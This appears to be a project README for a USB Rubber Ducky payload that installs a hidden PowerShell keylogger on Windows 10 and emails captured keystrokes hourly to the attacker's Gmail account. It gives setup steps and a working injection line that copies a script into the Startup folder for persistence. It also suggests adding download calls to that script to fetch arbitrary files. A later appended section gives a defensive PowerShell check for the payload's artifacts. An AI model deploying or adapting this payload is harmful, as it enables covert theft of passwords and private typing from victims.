Chris Taylor [Blue Cosmo] | 08/24/21
A new version of this payload is available HERE
DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes
- moves c.cmd file to windows startup directory
- c.cmd will secretly run p.ps1
- p.ps1 will log keystrokes
- l.ps1 will email the logs every startup and every hour [via SMTP]
- sends logs hourly, regardless of system time
- Twin-Duck firmware
- Gmail account
  - I suggest making a separate Gmail account for this payload
  - your Gmail must have LSA Access enabled
- Windows 10 Target
Set-Up/Installation
- change Gmail credentials in p.ps1
# gmail credentials
$email = "[email protected]"
$password = "password"
- in line 20 of payload.txt, change 'L' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
- flash Twin-Duck firmware on to your duck
- load, encode, and deploy!!
The c.cmd attack opportunity
The c.cmd file runs at every startup. This means an attacker could place a 'wget' or 'Invoke-WebRequest' call in it and have a file downloaded from anywhere on the internet onto the computer. The file would then be saved in the startup directory, allowing it to run at every startup.
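A defender-side check for the artifacts this README describes, added here as an example and not part of the payload or the author's code: it lists script files in the per-user Startup folder, flags any that contain the download commands named above, and looks for p.ps1 and the per-user .log file in the temp directory. The function name `Find-DucKeyArtifacts` and the extension list are assumptions made for illustration.

```powershell
# Added defensive example; not part of the DucKey Logger project.
# Reports the on-disk artifacts the README describes: a script in the per-user
# Startup folder, plus p.ps1 and "<username>.log" in the user's temp directory.
function Find-DucKeyArtifacts {   # hypothetical name, chosen for this example
    param(
        [string]$StartupDir = (Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'),
        [string]$TempDir    = $env:TEMP,
        [string]$UserName   = $env:USERNAME
    )

    # Script extensions worth reviewing in Startup (list is an assumption)
    $scriptExt = '.cmd', '.bat', '.vbs', '.js', '.wsf', '.hta', '.ps1'
    # Download commands named in the README, plus the cmdlet's built-in aliases
    $downloadPattern = 'Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b'

    if (Test-Path -LiteralPath $StartupDir) {
        Get-ChildItem -LiteralPath $StartupDir -File -Force |
            Where-Object { $scriptExt -contains $_.Extension.ToLower() } |
            ForEach-Object {
                [pscustomobject]@{
                    Reason      = 'Script in Startup folder'
                    Path        = $_.FullName
                    Created     = $_.CreationTime
                    HasDownload = [bool](Select-String -LiteralPath $_.FullName -Pattern $downloadPattern -Quiet)
                }
            }
    }

    # Files the README says are copied to or created in the temp directory
    foreach ($name in 'p.ps1', "$UserName.log") {
        $path = Join-Path $TempDir $name
        if (Test-Path -LiteralPath $path) {
            $item = Get-Item -LiteralPath $path -Force
            [pscustomobject]@{
                Reason      = 'File named in README found in temp directory'
                Path        = $item.FullName
                Created     = $item.CreationTime
                HasDownload = $false
            }
        }
    }
}

Find-DucKeyArtifacts | Format-Table -AutoSize
```

Hits are leads for review rather than proof of compromise, since legitimate software also places scripts in Startup and log files in the temp directory.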
- hope you enjoy the payload!!